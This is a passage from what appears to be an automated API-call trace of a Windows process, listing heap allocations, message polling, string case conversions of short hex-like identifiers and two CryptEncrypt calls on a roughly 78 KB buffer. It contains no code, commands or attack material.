0x2a71b98 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0168.768] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0168.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0168.768] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0168.769] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.769] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d70 | out: hHeap=0x2af0000) returned 1 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.769] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.770] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0168.770] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0168.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0168.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0168.770] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0168.770] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0168.770] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0168.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0168.770] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.771] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0168.771] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0168.771] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0168.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0168.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0168.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0168.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d3198 | out: hHeap=0x2af0000) returned 1 [0168.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.773] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0168.774] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0168.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0168.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0168.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0168.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0168.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0168.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0168.780] CryptEncrypt (in: hKey=0x9e20b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13141, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13148) returned 1 [0168.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.780] CharLowerBuffW (in: lpsz="byte[78152]", cchLength=0xb | out: lpsz="byte[78152]") returned 0xb [0168.780] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.782] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.782] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.782] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.782] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.782] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.782] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0168.782] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0168.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0168.782] CryptEncrypt (in: hKey=0x9e20b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d3198*, pdwDataLen=0x8cef60*=0x13141, dwBufLen=0x13148 | out: pbData=0x37d3198*, pdwDataLen=0x8cef60*=0x13148) returned 1 [0168.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.785] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.787] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.787] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.787] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.787] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.788] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.788] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.788] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.788] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.788] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.788] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0168.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.788] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.788] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.788] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.788] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.788] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0168.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0168.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.809] 